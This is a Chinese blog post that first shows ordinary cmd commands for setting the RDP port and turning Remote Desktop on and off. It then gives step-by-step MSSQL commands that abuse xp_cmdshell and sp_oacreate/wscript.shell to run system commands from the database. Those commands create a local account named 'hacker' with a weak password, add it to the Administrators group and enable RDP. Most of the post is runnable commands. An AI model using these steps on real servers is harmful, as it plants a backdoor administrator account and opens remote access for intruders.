该博客主要介绍在Windows系统下开启远程桌面协议(RDP)的方法。包括使用cmd命令开启,如设置端口、开启和关闭远程桌面等操作;还介绍了通过mssql开启,如利用xp_cmdshell和sp_oacreate - sp_oamethod两种方式,涉及提权、设置端口等步骤。
目录
2、利用sp_oacreate--sp_oamethod开启rdp
一、cmd命令开启rdp
1.设置远程桌面端口
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f2.开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 13.检查端口状态
netstat -an|find "3389"4.关闭远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0二、mssql开启rdp
1、利用xp_cmdshell开启rdp
1.打开扩展存储过程xp_cmdshell
use master
go
reconfigure --先执行一次刷新,处理上次的配置
exec sp_configure 'show advanced option',1 --启用xp_cmdshell的高级配置
go
reconfigure
go
exec sp_configure 'xp_cmdshell',1 --打开xp_cmdshell,可以调用SQL系统之外的命令
go
reconfigure
go2.添加新用户,并将用户添加到管理员组(提权)--可用于登录rdp
exec xp_cmdshell 'net user hacker 123456 /add';
exec xp_cmdshell 'net localgroup administrators hacker /add';
exec xp_cmdshell 'net user'
go3.设置rdp端口,并开启rdp
EXEC xp_cmdshell 'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f' --设置远程桌面端口
EXEC xp_cmdshell '
wmic RDTOGGLE WHERE ServerName="%COMPUTERNAME%" call SetAllowTSConnections 1' --开启远程桌面;若wmic没安装、会自动安装、需要稍等一会4.检查端口状态
EXEC xp_cmdshell 'netstat -an|find "3389"' --检查端口状态5.关闭远程桌面
EXEC xp_cmdshell 'wmic RDTOGGLE WHERE ServerName="%COMPUTERNAME%" call SetAllowTSConnections 0' --关闭远程桌面6.关闭扩展存储过程xp_cmdshell
EXEC sp_configure 'show advanced options','1' --确保show advances options 的值为1,这样才可以执行xp_cmdshell为0的操作
go
reconfigure
go
EXEC sp_configure 'xp_cmdshell',0 --关闭xp_cmdshell
go
reconfigure
go
EXEC sp_configure 'show advanced options','0' --关闭show advanced options
go
reconfigure
go2、利用sp_oacreate--sp_oamethod开启rdp
1.启用 OLE Automation Procedures
-- 启用显示高级选项
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
-- 启用 OLE Automation Procedures
EXEC sp_configure 'ole automation procedures', 1;
RECONFIGURE WITH OVERRIDE;
2.添加新用户,并将用户添加到管理员组(提权)--可用于登录rdp
declare @shellx int
exec sp_oacreate 'wscript.shell',@shellx output
exec sp_oamethod @shellx,'run',null,'net user hacker 123456 /add' -- 添加新用户
exec sp_oamethod @shellx,'run',null,'net localgroup Administrators hacker /add' -- 将用户添加到管理员组的命令3.设置rdp端口,并开启rdp
declare @shellx int
exec sp_oacreate 'wscript.shell',@shellx output
exec sp_oamethod @shellx,'run',null,'c:\windows\system32\cmd.exe /c reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f '
exec sp_oamethod @shellx,'run',null,'c:\windows\system32\cmd.exe /c wmic RDTOGGLE WHERE ServerName="%COMPUTERNAME%" call SetAllowTSConnections 1 '4.关闭远程桌面
declare @shellx int
exec sp_oacreate 'wscript.shell',@shellx output
exec sp_oamethod @shellx,'run',null,'c:\windows\system32\cmd.exe /c wmic RDTOGGLE WHERE ServerName="%COMPUTERNAME%" call SetAllowTSConnections 0'5.关闭 OLE Automation Procedures
exec sp_configure 'show advanced options',1 --确保show advances options 的值为1
RECONFIGURE
exec sp_configure 'ole Automation Procedures',0 --关闭OLE Automation Procedures
RECONFIGURE
exec sp_configure 'show advanced options',0 --关闭高级配置
RECONFIGURE
扫一扫
3170
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
